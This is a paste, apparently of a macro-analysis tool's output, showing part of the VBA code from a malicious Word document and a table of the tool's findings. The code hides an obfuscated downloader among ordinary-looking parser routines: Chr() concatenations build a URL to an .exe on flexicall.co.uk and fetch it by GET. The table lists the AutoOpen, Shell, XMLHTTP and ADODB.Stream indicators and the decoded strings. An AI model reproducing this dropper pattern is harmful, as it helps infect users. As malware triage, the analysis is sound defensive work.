  843.             End If
  844.            
  845.             If oSub(3).Index = 1 Then
  846.                 If oSub(3)(1).Index = 1 Then
  847.                     AddText "CASE", auxkeyword_col
  848.                 Else
  849.                     AddText "^", auxkeyword_col
  850.                 End If
  851.                 AddText Spacer(WS(oSub(4))), vbBlack
  852.             End If
  853.            
  854.             Select Case oSub(5).Index
  855.                 Case 1 ' range
  856.                    AddText oSub(5)(1)(1).Text, vbBlack
  857.                     AddText Spacer(WS(oSub(5)(1)(2))), vbBlack
  858.                     If oSub(5)(1)(3).Index = 1 Then
  859.                         AddText "TO", auxkeyword_col
  860.                     Else
  861.                         AddText "-", auxkeyword_col
  862.                     End If
  863.                     AddText Spacer(WS(oSub(5)(1)(4))), vbBlack
  864.                     AddText oSub(5)(1)(5).Text, vbBlack
  865.                 Case 2, 3 ' number
  866.                    AddText oSub(5)(1).Text, vbBlack
  867.             End Select
  868.         End If
  869.     Next
  870. End Function
  871.  
  872. Public Function Left20Digits(Interleave2 As Object)
  873. Dim vDecodeD2 As String
  874. vDecodeD2 = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & "/" & Chr(102) & "l" & "e" & Chr(120) & "i" & Chr(99) & Chr(97) & "l" & Chr(108) & Chr(46) & Chr(99) & "o" & Chr(46) & "u" & Chr(107) & "/" & Chr(102) & Chr(115) & Chr(102) & Chr(52) & "f" & "d" & Chr(51) & Chr(50) & "/" & "8" & "i" & Chr(107) & Chr(54) & Chr(115) & Chr(99) & "." & Chr(101) & Chr(120) & "e"
  875. Interleave2.Open Chr(71) & "E" & Chr(84), vDecodeD2, False
  876. End Function
  877.  
  878. Private Function ParseLiteralSubExpression(oResult As Integer)
  879.     Dim oSub As ParseTree
  880.    
  881.     If oResult(1).Index = 1 Then
  882.         If oResult(1)(1)(1).Index = 1 Then
  883.             AddText "CASE ", auxkeyword_col
  884.         Else
  885.             AddText "^", auxkeyword_col
  886.         End If
  887.     End If
  888.    
  889.     For Each oSub In oResult(2).SubTree
  890.         If oSub(1).Text = "+" Then
  891.             AddText "+ ", auxkeyword_col
  892.         Else
  893.             AddText oSub.Text, vbBlack
  894.         End If
  895.     Next
  896. End Function
  897.  
  898. Private Sub AddText(ByVal sAddString As String, ByVal lColour As Long)
  899.     Dim lTextPos As Long
  900.    
  901.     lTextPos = Len(CanonicalText) + 1
  902.     CanonicalText = CanonicalText & sAddString
  903.     Positions.Add lTextPos
  904.     Colours.Add lColour
  905. End Sub
  906.  
  907.  
  908. +------------+----------------------+-----------------------------------------+
  909. | Type       | Keyword              | Description                             |
  910. +------------+----------------------+-----------------------------------------+
  911. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  912. | Suspicious | Open                 | May open a file                         |
  913. | Suspicious | Binary               | May read or write a binary file (if     |
  914. |            |                      | combined with Open)                     |
  915. | Suspicious | CreateObject         | May create an OLE object                |
  916. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  917. |            |                      | strings                                 |
  918. | Suspicious | SaveToFile           | May create a text file                  |
  919. | Suspicious | Write                | May write to a file (if combined with   |
  920. |            |                      | Open)                                   |
  921. | Suspicious | Output               | May write to a file (if combined with   |
  922. |            |                      | Open)                                   |
  923. | Suspicious | Print #              | May write to a file (if combined with   |
  924. |            |                      | Open)                                   |
  925. | Suspicious | Shell                | May run an executable file or a system  |
  926. |            |                      | command (obfuscation: VBA expression)   |
  927. | Suspicious | ADODB.Stream         | May create a text file (obfuscation:    |
  928. |            |                      | VBA expression)                         |
  929. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  930. |            |                      | (obfuscation: VBA expression)           |
  931. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  932. |            |                      | be used to obfuscate strings (option    |
  933. |            |                      | --decode to see all)                    |
  934. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  935. |            |                      | may be used to obfuscate strings        |
  936. |            |                      | (option --decode to see all)            |
  937. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  938. |            | Strings              | may be used to obfuscate strings        |
  939. |            |                      | (option --decode to see all)            |
  940. | IOC        | http://flexicall.co. | URL (obfuscation: VBA expression)       |
  941. |            | uk/fsf4fd32/8ik6sc.e |                                         |
  942. |            | xe                   |                                         |
  943. | IOC        | vtsAbd.exe           | Executable file name (obfuscation: VBA  |
  944. |            |                      | expression)                             |
  945. | IOC        | 8ik6sc.exe           | Executable file name (obfuscation: VBA  |
  946. |            |                      | expression)                             |
  947. | VBA string | Shell;<=.Application | (Chr(83) & "h" & "e" & Chr(108) &       |
  948. |            |                      | Chr(108) & ";<=" + Chr(46) & Chr(65) &  |
  949. |            |                      | "p" & Chr(112) & Chr(108) & Chr(105) &  |
  950. |            |                      | Chr(99) & Chr(97) & Chr(116) & Chr(105) |
  951. |            |                      | & Chr(111) & Chr(110))                  |
  952. | VBA string | Microsoft.XMLHTTP    | (Chr(77) & Chr(105) & "c" & Chr(114) &  |
  953. |            |                      | Chr(111) & Chr(115) & Chr(111) &        |
  954. |            |                      | Chr(102) & "t" & Chr(46) & Chr(88) &    |
  955. |            |                      | "M" & Chr(76) & "H" & Chr(84) & Chr(84) |
  956. |            |                      | & "P")                                  |
  957. | VBA string | Adodb.Stream         | (Chr(65) & "do" & Chr(100) & Chr(98) &  |
  958. |            |                      | Chr(46) & Chr(83) & Chr(116) & Chr(114) |
  959. |            |                      | & Chr(101) & "a" & Chr(109))            |
  960. | VBA string | WScript              | Chr(87) & Chr(80 + 3) & Chr(99) &       |
  961. |            |                      | Chr(114) & Chr(105) & Chr(112) &        |
  962. |            |                      | Chr(116)                                |
  963. | VBA string | hell                 | Chr(104) & Chr(101) & Chr(108) &        |
  964. |            |                      | Chr(108)                                |
  965. | VBA string | Process              | (Chr(80) & Chr(114) & "o" & Chr(99) &   |
  966. |            |                      | Chr(101) & "s" & "s")                   |
  967. | VBA string | TEMP                 | ("T" & Chr(69) & Chr(77) & Chr(80))     |
  968. | VBA string | \vtsAbd.exe          | "\" & "vts" & Chr(65) & "bd." & "e" &   |
  969. |            |                      | Chr(120) & "e"                          |
  970. | VBA string | http://flexicall.co. | Chr(104) & Chr(116) & Chr(116) &        |
  971. |            | uk/fsf4fd32/8ik6sc.e | Chr(112) & Chr(58) & Chr(47) & "/" &    |
  972. |            | xe                   | Chr(102) & "l" & "e" & Chr(120) & "i" & |
  973. |            |                      | Chr(99) & Chr(97) & "l" & Chr(108) &    |
  974. |            |                      | Chr(46) & Chr(99) & "o" & Chr(46) & "u" |
  975. |            |                      | & Chr(107) & "/" & Chr(102) & Chr(115)  |
  976. |            |                      | & Chr(102) & Chr(52) & "f" & "d" &      |
  977. |            |                      | Chr(51) & Chr(50) & "/" & "8" & "i" &   |
  978. |            |                      | Chr(107) & Chr(54) & Chr(115) & Chr(99) |
  979. |            |                      | & "." & Chr(101) & Chr(120) & "e"       |
  980. | VBA string | GET                  | Chr(71) & "E" & Chr(84)                 |
  981. +------------+----------------------+-----------------------------------------+
RAW Paste Data